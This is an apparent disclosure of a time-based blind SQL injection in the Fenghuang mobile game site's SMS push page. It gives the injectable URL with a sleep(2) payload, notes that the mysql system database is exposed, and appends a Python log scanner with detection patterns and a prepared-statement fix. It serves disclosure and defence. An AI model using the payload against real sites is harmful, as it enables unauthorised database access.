Brief description:
The Fenghuang (凤凰) mobile game site has a blind SQL injection vulnerability at the point where a mobile phone number is entered to send a push link.
Detailed description:
URL with the blind SQL injection:
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=18
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
The mysql system database is visible, so the user's privileges are probably very high.
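A detection check for requests like the one above, as an added example that is not part of the original report: it URL-decodes the query string of requests to game_send_sms.jsp and flags time-delay functions or non-numeric values in gameid and mo. Assumptions: combined-format access logs, a leading "/" on the path, both parameters being digits only, and the constructed sample lines and addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (addresses and mo value are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Apr/2013:12:54:01 +0800] "GET /fenghuang/game/'
    'game_send_sms.jsp?gameid=130221346000&mo=10000000000 HTTP/1.1" 200 512',
    '203.0.113.9 - - [11/Apr/2013:12:54:48 +0800] "GET /fenghuang/game/'
    'game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27'
    '&mo=10000000000 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Delay primitives commonly seen in time-based blind injection probes.
TIME_FUNCS = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay",
                        re.IGNORECASE)
NUMERIC_PARAMS = {"gameid", "mo"}  # assumption: both are digit-only fields


def inspect_line(line):
    """Return (client, findings) for one log line; findings may be empty."""
    m = REQUEST_RE.search(line)
    if not m:
        return None, []
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("game_send_sms.jsp"):
        return client, []
    findings = []
    # parse_qs percent-decodes, so %27 and %28 become ' and ( before matching.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            if TIME_FUNCS.search(value):
                findings.append((name, "time-delay function"))
            elif name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.append((name, "non-numeric value"))
    return client, findings


def scan(lines):
    """Return only the log lines that produced findings."""
    results = [inspect_line(line) for line in lines]
    return [(client, f) for client, f in results if f]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, findings)
```

The durable fix is on the server side: bind gameid and mo as parameters in a prepared statement and run the application under a database account without access to the mysql system database.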